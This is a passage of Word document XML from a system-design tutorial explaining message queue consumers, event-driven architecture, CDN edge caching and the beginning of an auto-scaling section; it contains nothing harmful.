    <w:p w14:paraId="5C43177F" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Producers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E93962" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>A producer sends a message to a topic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524B1AB3" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>A partitioning strategy determines which partition: partition = hash(key) % num_partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264C246A" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Message is appended to the chosen partition's log.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521DB2C0" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>The message is replicated to follower brokers for durability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585F4B16" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Consumers and Consumer Groups:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD074F1" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>A consumer group subscribes to a topic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A231540" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Each partition is assigned to exactly one consumer in the group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF2E79A" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>With 12 partitions and 4 consumers → each consumer handles 3 partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47ABF75B" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Scaling consumers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3D3401" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Add more consumers to the group (up to the number of partitions).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6600CAF3" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>12 partitions = maximum 12 consumers processing in parallel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4776BC25" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Need more parallelism? Increase partition count (but this is hard to do after the fact).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311CB88D" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Backpressure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E0BC49" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>If consumers can't keep up, messages accumulate in the queue (increasing consumer lag).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A405CE" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>This is visible and monitorable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747F55AC" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>You add more consumers or increase consumer throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54069D45" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>The producers are never blocked (the queue absorbs the spike).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCC4E97" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.3 Event-Driven Architecture for Scalability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EFA742" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The pattern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F075DA" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:lastRenderedPageBreak/>
        <w:t>Instead of services calling each other directly (synchronous, coupled), services emit events:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE61519" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Order Service writes "order_created" event.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C41EF2" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Payment Service consumes event, processes payment, emits "payment_completed."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E412F6" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Inventory Service consumes event, reserves stock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B85A89" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Notification Service consumes event, sends confirmation email.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4575F437" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Scalability benefits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5926AF88" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Each service scales independently based on its own load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C28CE2C" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Adding a new consumer (e.g., Analytics Service) requires zero changes to the producer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047A38B1" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Services are decoupled — one being slow doesn't block others.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDD9572" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Natural buffering — spikes in orders don't overwhelm downstream services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BB2AA1" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:pict w14:anchorId="29ACA464">
          <v:rect id="_x0000_i2292" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="715F31C2" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. Content Delivery Networks (CDN) — Scaling to Global Users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C04E66C" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.1 How a CDN Works Internally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13089C52" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Without CDN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C61BC99" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="140"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>User in Tokyo requests an image from a server in Virginia.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8D0602" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="140"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Round trip: ~200ms just for the TCP handshake (speed of light through fiber).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292C5F0F" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="140"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Then the actual data transfer, TLS handshake — total: 500ms+ for a single asset.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26477E3E" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>With CDN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC2E86B" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="141"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DNS resolution:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> User's DNS query for cdn.example.com returns the IP of the nearest CDN edge node (using GeoDNS or anycast).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135B06D3" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="141"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cache hit at edge:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262177BD" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="141"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Edge node in Tokyo has the image cached.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFB5224" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="141"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Returns immediately. Latency: 5–20ms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008B3009" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="141"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cache miss at edge:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BE6D9B" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="141"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:lastRenderedPageBreak/>
        <w:t>Edge doesn't have the image.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027FD730" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="141"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Edge requests from a </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>mid-tier/shield cache</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> (regional, reduces origin load).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6EFF76" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="141"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>If mid-tier misses, requests from the </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>origin server</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264B4676" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="141"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Edge caches the response for future requests (respecting Cache-Control headers).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DAD956" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The pull vs. push model:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D0821F" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pull (reactive):</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Edge fetches from origin on first request. Most CDNs work this way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181CBCDA" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Push (proactive):</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> You upload content directly to the CDN in advance. Used for known-popular content (video streaming, software downloads).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2185A5A7" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.2 CDN as a Scalability Mechanism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F30C2D3" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why CDN scales where your origin can't:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAED33F" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="143"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>A CDN like Cloudflare has 300+ edge locations, each with massive bandwidth.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EAF360" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="143"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Your origin serves each piece of content ONCE to the CDN.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55877B65" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="143"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>The CDN serves it millions of times.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4995C382" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="143"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Cache hit ratio of 95% means your origin handles only 5% of requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117A28B2" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CDN for dynamic content:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1677FFAC" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Modern CDNs can also cache personalized content:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14981625" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="144"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Edge computing (Cloudflare Workers, Lambda@Edge):</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Run application logic at the edge.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299646CF" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="144"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ESI (Edge Side Includes):</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Assemble pages from cached fragments + dynamic fragments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052743FA" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="144"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>API caching with Vary headers:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Cache API responses per user-group or per-region.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6779F4" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:pict w14:anchorId="5F2B47B3">
          <v:rect id="_x0000_i2293" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BE5EF4" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8. Auto-Scaling — Dynamic Horizontal Scaling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4DA444" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.1 How Auto-Scaling Works Internally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A36E4A" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The control loop:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCADF75" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="145"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Monitor:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Collect metrics (CPU utilization, request count, queue depth, custom metrics).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEB456C" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="145"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Evaluate:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Compare metrics against scaling policies (e.g., "if avg CPU &gt; 70% for 3 minutes").</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED329BD" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="145"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
